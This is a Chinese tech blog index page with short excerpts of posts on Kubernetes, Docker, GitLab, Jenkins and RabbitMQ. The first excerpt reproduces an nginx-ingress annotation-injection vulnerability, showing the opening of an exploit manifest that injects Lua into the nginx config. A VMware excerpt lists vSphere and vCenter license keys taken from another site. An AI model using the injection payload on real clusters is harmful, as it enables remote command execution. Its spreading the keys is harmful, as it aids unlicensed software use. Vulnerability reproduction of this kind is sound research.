Myluzh Blog

关于K8S nginx-ingress组件任意写入配置进行命令执行漏洞的复现与研究

2023-11-16 myluzh Kubernetes

0x01 开头 这里的ingress一定要是nginx,进行复现的环境k8s版本是1.25,ingress里面参数nginx.ingress.kubernetes.io/rewrite-target,可以任意插入,就尝试插入 lua 代码通过注解注入特殊字符尝试闭合nginx配置文件块从而实现插入任意配置实现命令执行。 0x02 复现 1、exp-ingress.yaml如下 apiVersion: networking.k8s.io/v1 kind: Ingress metadata: name: ingress-exploit annotations: kubernetes.io/ingress.class: "nginx" nginx.ingress.kubernetes.io/rewrite-target: | execute-command/ last; } location execute-command/ { content_by_lua_block { local handle =...

阅读全文>>

标签: k8s nginx Ingress exp

评论(0) (445)

K8S部署nfs-client-provisioner实现PV自动供给

2023-11-9 myluzh Kubernetes

0x00 介绍 1、NFS-Subdir-External-Provisioner 在Kubernetes中,一个PersistentVolume(PV)只能绑定到一个PersistentVolumeClaim(PVC)。PV和PVC之间是一对一的关系,每个PVC只能绑定到一个PV。 使用支持动态PV和PVC创建的存储插件,您可以为每个PVC动态创建一个独立的PV。这样,每个PVC都有自己的PV,但它们可以共享相同的存储资源。 部署 NFS-Subdir-External-Provisioner 提供动态分配卷,NFS-Subdir-External-Provisioner是一个自动配置卷程序,它使用现有的和已配置的 NFS 服务器来支持通过持久卷声明动态配置 Kubernetes 持久卷。 持久卷被配置为:${namespace}-${pvcName}-${pvName}。 此组件是对 nfs-client-provisioner 的扩展,nfs-client-provisioner 已经不提供更新,且 nfs-client-provisioner 的 Github 仓库已经迁移到 NFS-Subdir-Ex...

阅读全文>>

标签: k8s nfs pv pvc nfs-client-provisioner storageclass

评论(0) (563)

K8S部署定制RabbitMQ镜像 & 多节点RabbitMQ集群

2023-11-9 myluzh Kubernetes

0x01 定制RabbitMQ镜像 本文章基于DockerHub镜像rabbitmq:3.12.8-management,由于官方镜像没有集成有些插件,需要在镜像中安装插件并重新打包。 rabbitmq_delayed_message_exchange延迟队列插件的安装,rabbitmq 插件下载(官网):https://www.rabbitmq.com/community-plugins.html【根据rabbitmq版本选择对应的插件,web管理页面首页可以查看rabbitmq版本】,手动安装插件教程参考:https://blog.csdn.net/user2025/article/details/105620908 下载完成rabbitmq_delayed_message_exchange-3.12.0.ez后,放到跟dockerfile同一目录,然后使用docker build进行打包。 DockerFile如下: FROM rabbitmq:3.12.8-management ADD ./rabbitmq_delayed_message_exchang...

阅读全文>>

标签: docker k8s dockerfile rabbitmq

评论(0) (645)

Docker部署GitLab-CE

2023-11-8 myluzh Docker

0x01 docker部署 docker run -d \ --name gitlab \ -p 9443:443 \ -p 9999:80 \ -p 9998:22 \ -v /etc/gitlab:/etc/gitlab \ -v /var/log/gitlab:/var/log/gitlab \ -v /var/opt/gitlab:/var/opt/gitlab \ -v /etc/localtime:/etc/localtime \ --privileged=true \ gitlab/gitlab-ce:latest 访问地址:http://IP:9999  首次登陆页面的账号是root,密码则是临时密码,保存在/etc/gitlab/initial_root_password中,初始密码保存24小时,自动删除,首次登陆后需要修改密码操作。 0x02 配置ssh秘钥 SSH密钥用于在您的电脑和GitLab建立安全连接。 SSH 指纹验证客户端是否连接到正确的主机。 # 在本地计算机上生成了SSH密钥对,请将 "your_ema...

阅读全文>>

标签: docker gitlib git

评论(0) (308)

VMware vSphere vCenter 8.0 许可证

2023-11-8 myluzh VMware

0x01 vSphere 8的新增功能 VMware vSphere 8是一个企业工作负载平台,它为本地工作负载带来了云的好处。它通过基于DPU和GPU的加速增强了性能,通过VMware云控制台提高了运营效率,与附加混合云服务无缝集成,并通过与VM一起运行容器的企业级集成Kubernetes运行时加速了创新。 0x02 许可注册 vSphere Enterprise Plus: HG00K-03H8K-48929-8K1NP-3LUJ4 4F40H-4ML1K-M89U0-0C2N4-1AKL4 vCenter Standard : 4F282-0MLD2-M8869-T89G0-CF240 0F41K-0MJ4H-M88U1-0C3N0-0A214 来源于:https://technet24.ir/vmware-vsphere-8-26918

阅读全文>>

标签: vmware vSphere 许可证

评论(0) (475)

Docker部署Jenkins与创建流水线笔记

2023-11-7 myluzh Docker

0x00 前言 使用docker部署jenkins后使用流水线docker build提示找不到docker命令,找了好久解决了,需要把docker挂载出来。 第二个问题是docker login 私有仓的时候 提示证书不对,需要在配置文件添加下insecure-registries 0x01 jenkins正确部署命令 docker run --name jenkins \ -u root \ --rm -d \ -p 8092:8080 \ -v /var/jenkins_home:/var/jenkins_home \ -v $(which docker):/usr/bin/docker \ -v /var/run/docker.sock:/var/run/docker.sock \ -v /etc/docker/:/etc/docker \ jenkins/jenkins:lts 启动后在本机/etc/docker/daemon.json上添加insecure-regstries里面写上你jenkins流水线do...

阅读全文>>

标签: docker devops cicd jenkins

评论(0) (284)